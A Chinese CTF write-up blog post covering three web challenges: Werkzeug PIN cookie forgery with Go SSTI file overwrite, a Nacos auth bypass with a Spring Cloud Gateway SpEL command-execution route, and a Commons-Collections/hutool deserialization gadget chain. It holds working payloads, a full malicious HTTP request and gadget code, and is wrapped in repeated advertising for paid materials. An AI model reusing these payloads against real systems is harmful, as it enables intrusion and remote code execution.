先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

其中uuid.getnode()返回机器的硬件地址（MAC地址），而get_machine_id()返回特定于平台的唯一ID。

4. 哈希所有的信息: 将所有上述信息串联并进行哈希，得到一个SHA1哈希值。

codefor bit in chain(probably_public_bits, private_bits):
     if not bit:
         continue
     if isinstance(bit, str):
         bit = bit.encode("utf-8")
     h.update(bit)
h.update(b"cookiesalt")

这里，chain(probably_public_bits, private_bits)函数将公开信息和私有信息合并为一个序列，然后这个序列中的每一项都被加入到哈希中。

h.update(b"cookiesalt")添加了一个额外的“salt”值，以确保最终的哈希值是独特的。

5. 生成cookie名称:

cookie_name = f"__wzd{h.hexdigest()[:20]}"

将哈希值转换为16进制的字符串形式，并从中取出前20个字符。然后，它前面添加了"__wzd"前缀来生成最终的cookie_name。

再通过查找cookie_name关键字，找到set_cookie方法

通过观察可知，cookie的值是通过时间戳+pin码的hash，由"|"符号拼接而来的

再去看看验证逻辑

    def check\_pin\_trust(self, environ: WSGIEnvironment) -> bool | None:
        """Checks if the request passed the pin test. This returns `True` if the
 request is trusted on a pin/cookie basis and returns `False` if not.
 Additionally if the cookie's stored pin hash is wrong it will return
 `None` so that appropriate action can be taken.
 """
        if self.pin is None:
            return True
        val = parse_cookie(environ).get(self.pin_cookie_name)
        if not val or "|" not in val:
            return False
        ts_str, pin_hash = val.split("|", 1)
        try:
            ts = int(ts_str)
        except ValueError:
            return False
        if pin_hash != hash_pin(self.pin):
            return None
        return (time.time() - PIN_TIME) < ts

不难看出，由于时间戳是明文，所以伪造一个大一点的时间戳即可绕过检验。因为hash算法就在代码里，所以下后面就是如何找出伪造pin码的几个要素。

一般来说，需要通过报错来获取信息，但是不管对name怎么fuzz，由于传参限制都无法报错。看了其他师傅的wp后才发现，可以使得name参数为空来报错。。。。

报错信息中，有用的除了一些路径外,值得注意的是这几行

File "/app/server.py", line 7, in index
 
app = Flask(__name__)
@app.route('/')
def index():
    name = request.args['name']
    return name + " no ssti"
 
if __name__ == "\_\_main\_\_":
    app.run(host="127.0.0.1", port=5000, debug=True)

无法ssti，也没什么用。

又坐牢了一段时间，无奈之下又只能瞅一瞅师傅们的wp，好家伙，原来SESSION_KEY是空的，逗人玩呢。

那就修改一下Admin的路由，用来获取admin的session

session.Values["name"] = "admin"
err = session.Save(c.Request, c.Writer)

拿着伪造的session去访问靶机的admin路由，提示我们用ssti，那就ssti

经过检验确实存在ssti，但这里不是python的ssti，是go的ssti，网上大多提到了{{.}}来获取全局变量，但对这道题来说没什么用

换个思路，既然ssti是代码执行的话，那就用go来进行RCE不就行了

但是xssWaf := html.EscapeString(name)会转义引号，所以payload里不能用引号，寻找思路类似于PHP的无字母数字RCE

前面通过session伪造pin的思路不对或者太麻烦(因为没找到能不用引号的payload)，思路转换为替换server.py文件，需要用到以下几个方法:

c.SaveUploadedFile(file *multipart.FileHeader, dst string)

保存上传的文件

c.FormFile(name string)

获取上传的文件

c.HandlerName()

获取正在处理的路由的处理函数名称,这里为main.Admin

c.Request.Referer():

获取Referer头

构造以下payload

c.SaveUploadedFile(c.FormFile(c.HandlerName()),c.Request.Referer())

最终HTTP请求体

GET /admin?name=%7b%7bc.SaveUploadedFile(c.FormFile(c.HandlerName())%2cc.Request.Referer())%7d%7d HTTP/1.1
Host: d5d0420f-1268-449d-a3df-00307c395edd.challenge.ctf.show
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Referer: /app/server.py
Connection: close
Cookie: session-name=MTY5NzE4NjkzMHxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkc1aGJXVUdjM1J5YVc1bkRBY0FCV0ZrYldsdXwInXwlMhNgf5c-RWJSULVMGWSUrousqud2c8o96O0sDQ==;
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 408
--AaB03x
Content-Disposition: form-data; name="main/route.Admin"; filename="server.py"
Content-Type: text/plain
from flask import Flask, request, send_from_directory
import os
app = Flask(__name__)
@app.route('/a', methods=['GET'])
def read_file_content():
		
    return os.popen("cat /th1s_1s_f13g").read()
if __name__ == '__main__':
    app.run("0.0.0.0",5000,debug=True)
--AaB03x--

BackendService

靶机环境为NACOS，查找相关漏洞

Nacos（Dynamic Naming and Configuration Service）是一个开源的、易于使用的平台，为微服务架构提供了服务发现、服务配置以及服务管理功能。

找到一个身份认证漏洞，伪造JWT获取token，然后登录即可达到后台

这里要注意需要拦截登录后的第一个响应，然后Drop掉，否则会跳转到json页面，导致无法进入后台

Nacos 身份认证绕过漏洞QVD-2023-6271

找到了一个命令执行漏洞，但是尝试后无果。

又找到一篇利用SpringCloudGateway+Nacos进行RCE的文章

Nacos结合Spring Cloud Gateway RCE利用 - 先知社区

作者还贴心的附上了环境搭建步骤，所以我们要先搭建好环境

首先看附件里的bootstrap.yml

spring:
  cloud:
    nacos:
      config:
        name: backcfg
        file-extension: yaml
        group: DEFAULT_GROUP
        server-addr: 127.0.0.1:8848
      discovery:
        server-addr: 127.0.0.1:8848

这里的配置文件貌似给错了，因为wp里是json，端口是8888

对应的作用如下

属性	意义
spring.cloud.nacos.config.name	Nacos配置的Data ID。它标识了配置的名称为backcfg。
spring.cloud.nacos.config.file-extension	指定Nacos配置的文件格式。在这里，文件格式被设定为yaml。
spring.cloud.nacos.config.group	Nacos配置的组名。此处的组名被设定为DEFAULT_GROUP。
spring.cloud.nacos.config.server-addr	Nacos服务的地址和端口。此处意味着Nacos运行在本地127.0.0.1地址的8848端口上。
spring.cloud.nacos.discovery.server-addr	Nacos服务发现功能的地址和端口。它也指向运行在127.0.0.1地址的8848端口的Nacos服务。

在这种情况下，Spring Cloud Gateway会去Nacos配置中心寻找一个名为backcfg的配置项，而这个配置项的格式是yaml。因此，Nacos要提供一个名为backcfg.yaml的文件内容给Spring Cloud Gateway。

所以我们需要先去配置管理->配置列表下增加一个新的配置文件，格式选为yaml，名称设置为backcfg。上传内容就是application.yaml中的内容

如果成功了，在监听查询中就会出现使用该配置的host信息

该yaml中的每个属性对应的作用如下：

属性	意义
spring.main.web-application-type	设置Spring Boot应用的类型为响应式。常用于WebFlux框架。
spring.application.name	定义应用的名称，此处为backendservice。
server.port	定义Spring Boot应用监听的端口，此处为18888。
management.endpoint.gateway.enabled	启用或禁用gateway端点，默认为true。用于获取网关的路由信息。
management.endpoints.web.exposure.include	指定哪些端点可以被暴露，此处只暴露了gateway端点。
management.endpoints.web.exposure.include (下面的)	指定哪些端点可以被暴露，此处使用*，表示暴露所有端点。
spring.main.allow-bean-definition-overriding	是否允许覆盖bean定义。当有多个bean定义时，此属性允许一个bean定义覆盖另一个。默认为false。
spring.cloud.gateway.routes	定义Spring Cloud Gateway的路由信息。
spring.cloud.gateway.routes.id	每个路由的唯一标识，此处为index。
spring.cloud.gateway.routes.uri	指定路由目标的URI。当请求匹配某个路由时，它会被转发到这个URI。此处为http://example.com。
spring.cloud.gateway.routes.predicates	路由断言定义。决定哪些请求可以被路由。在这里，任何请求路径为/example的请求都会匹配到这个路由。

但这道题的环境原因导致spring gateway我们无法访问，所以通过添加路由来访问的上述方法无法利用。

顺着文章再往下看，发现可以利用

spring:
  cloud:
    gateway:
      routes:
        - id: exam
          order: 0
          uri: lb://backendservice
          predicates:
            - Path=/echo/\*\*
          filters:
            - name: AddResponseHeader
              args:
                name: result
                value: "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{''}).getInputStream())).replaceAll('\n','').replaceAll('\r','')}"

但是不知道为什么，wp里说是json格式，并且其他师傅的配置文件中是指明json，但我的靶机里就是yaml。。。

还有个坑点就是既然我们无法直接访问gateway来知道结果的话，一般来说就会用curl来判断是否成功rce，但这道题的靶机没有安装curl，所以我一直以为是哪里搞错了。。

这道题做完后其实感觉并不难，但是毕竟没有接触过微服务的人一开始做的话很难理解。所以我尽量去理解了spring gateway和nacos的原理，配置选项，以及他们如何实现联动的，感觉和JNDI的中心化管理思想很类似，还算是有点收获

deserbug

题目给出了commons-collections-3.2.2.jar，因为大于3.1版本，也不是4.0版本，所以不能直接使用经典的CC链，比如在InvokerTransformer类中的readObject加了一行

FunctorUtils.checkUnsafeSerialization(class$org$apache$commons$collections$functors$InvokerTransformer == null ? (class$org$apache$commons$collections$functors$InvokerTransformer = class$("org.apache.commons.collections.functors.InvokerTransformer")) : class$org$apache$commons$collections$functors$InvokerTransformer);

其中，checkUnsafeSerialization方法会尝试获取系统变量enableUnsafeSerialization的值

System.getProperty("org.apache.commons.collections.enableUnsafeSerialization");

如果获取不到或者该系统变量不为true，则抛出异常UnsupportedOperationException

题目hint为：cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept

原本以为是要在JSONObject.put执行时通过添加重复key来抛出异常

throw new JSONException("Duplicate key \"{}\"", new Object[]{key});

然后通过捕获这个异常来进行利用，但我发现首先checkDuplicate这个值无法控制，并且在put中为false，所以无法抛出该异常，除此之外，即使捕获到了JSONException也无法进行后续利用

看了小绿草实验室的WP，从JSONObject的put方法开始，一步一步调试到某个类执行getter方法，通过getter方法触发getAnyexcept,也就是说，这个hint结合源码具有一定的迷惑性，会引导人的想法到通过触发异常来gadget

WP中使用的gadget如下：

HashMap->readObject()->hash()->TiedMapEntry()->hashCode()->getValue()->LazyMap()->get()->ConstantTransformer->transform()->JSONObject->put()->TrAXFilter->newTransformer()->getTransletInstance()->Evil.class.newInstance()
//当然，不止一个gadget，在后续会说到

这里就是经验的差距体现出来了，如果不熟练那几条CC链，这个gatget是凑不起来的，就比如hint提示要用JSONObject.put和getAnyexcept，我们肯定知道最终利用的是getAnyexcept来加载恶意类，类比fastjson，就要想到hutool的json也可能有类似getter和setter的机制(事后诸葛亮一下:) )

本题目要调用的getter如下：

而如何能找到能够调用Myexpect的getter，WP上说是一步步调试的，但这个调试也得需要点技巧。原因在于wrap方法:

    public static Object wrap(Object object, JSONConfig jsonConfig) {
        if (object == null) {
            return jsonConfig.isIgnoreNullValue() ? null : JSONNull.NULL;
        } else if (!(object instanceof JSON) && !ObjectUtil.isNull(object) && !(object instanceof JSONString) && !(object instanceof CharSequence) && !(object instanceof Number) && !ObjectUtil.isBasicType(object)) {
            try {
                if (object instanceof SQLException) {
                    return object.toString();
                } else if (!(object instanceof Iterable) && !ArrayUtil.isArray(object)) {
                    if (!(object instanceof Map) && !(object instanceof Map.Entry)) {
                        if (!(object instanceof Date) && !(object instanceof Calendar) && !(object instanceof TemporalAccessor)) {
                            if (object instanceof Enum) {
                                return object.toString();
                            } else {
                                return ClassUtil.isJdkClass(object.getClass()) ? object.toString() : new JSONObject(object, jsonConfig);
                            }
                        } else {
                            return object;
                        }
                    } else {
                        return new JSONObject(object, jsonConfig);
                    }
                } else {
                    return new JSONArray(object, jsonConfig);
                }
            } catch (Exception var3) {
                return null;
            }
        } else {
            return object instanceof Number && null != jsonConfig.getDateFormat() ? new NumberWithFormat((Number)object, jsonConfig.getDateFormat()) : object;
        }
    }

从这个方法中可以提取出isIgnoreNullValue()，toString(),JSONArray(),getDateFormat(),getClass(),JSONObject()这几个方法，而这其中的一些方法还会嵌套其他方法，所以如果想挨个看的话很费精力。但我们可以初步淘汰几个，比如toString()，isIgnoreNullValue()这种稍微看一下就知道不能利用的。最后留下JSONObject()和JSONArray()，因为他们都会调用ObjectMapper.map()

//JSONArray.class
public JSONArray(Object object, JSONConfig jsonConfig, Filter> filter) throws JSONException {
        this(10, jsonConfig);
        ObjectMapper.of(object).map(this, filter);
    }
//JSONObject.class
public JSONObject(Object source, JSONConfig config, Filter> filter) {
    this(16, config);
    ObjectMapper.of(source).map(this, filter);
}

现在我们知道，既然hint提示需要调用JSONObject的put，而该类并没有readObject方法，故而需要找到一个能够调用任意类的put方法的链子作为gadget的一部分，而JSONObject正好也属于Map的实现类，从常用的反序列化类中，符合条件的就是LazyMap.get()

所以常见反序列化利用类需要很熟悉，否则很难想到这块

通过transform间接地实现控制value，并且key也是任意类型，但是在warp方法中，只传进了此方法中的value，再结合hint要利用Myexpect类的方法，猜测要将value赋值为Myexpect对象(这里可能有点牵强，但我也想不出其他更好的解释)。那么在上述的wrap方法中，如果传入的object是一个自定义的类，那么最终调用的就只能是new JSONObject(object, jsonConfig);，后续就会从ObjectMapper.class->map()->mapFromBean() ->······->PropDesc.class->getValue()执行myExpect.getAnyexcept()

那么剩下的就是从LazyMap向前拼gadget，可供选择的gadget如下：

//CC5 Gadget Chain:
BadAttributeValueExpException.readObject() -->
TiedMapEntry.toString() -->
LazyMap.get()
//CC6 Gadget Chain:
java.util.HashSet.readObject() -->
java.util.HashMap.put() -->
java.util.HashMap.hash() -->
org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode() -->
org.apache.commons.collections.keyvalue.TiedMapEntry.getValue() -->
org.apache.commons.collections.map.LazyMap.get()
//CC7 Gadget Chain:
java.util.Hashtable.readObject -->
java.util.Hashtable.reconstitutionPut() -->
org.apache.commons.collections.map.AbstractMapDecorator.equals() -->
java.util.AbstractMap.equals() -->
org.apache.commons.collections.map.LazyMap.get()

CC5

        ......
        ......
        TemplatesImpl templatesImpl = new TemplatesImpl();
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(Evil.class.getName());
        Reflection.setFieldValue(templatesImpl, "\_name", "Hello");
        Reflection.setFieldValue(templatesImpl, "\_bytecodes", new byte[][]
                {clazz.toBytecode()});
        Reflection.setFieldValue(templatesImpl, "\_tfactory", new
                TransformerFactoryImpl());
        Myexpect expect = new Myexpect();
        expect.setTargetclass(TrAXFilter.class);
        expect.setTypeparam(new Class[]{Templates.class});
        expect.setTypearg(new Object[]{templatesImpl});
        JSONObject jsonObject = new JSONObject();
### 给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。
![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)
同时每个成长路线对应的板块都有配套的视频提供：
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)
因篇幅有限，仅展示部分资料
**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）**
![img](https://img-blog.csdnimg.cn/img_convert/aa009943c8f91c54943baa2e46132747.png)
**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**
给大家的福利
**零基础入门**
对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。
![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)
同时每个成长路线对应的板块都有配套的视频提供：
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)
因篇幅有限，仅展示部分资料
**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）**
[外链图片转存中...(img-QgylHWak-1713191083728)]
**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**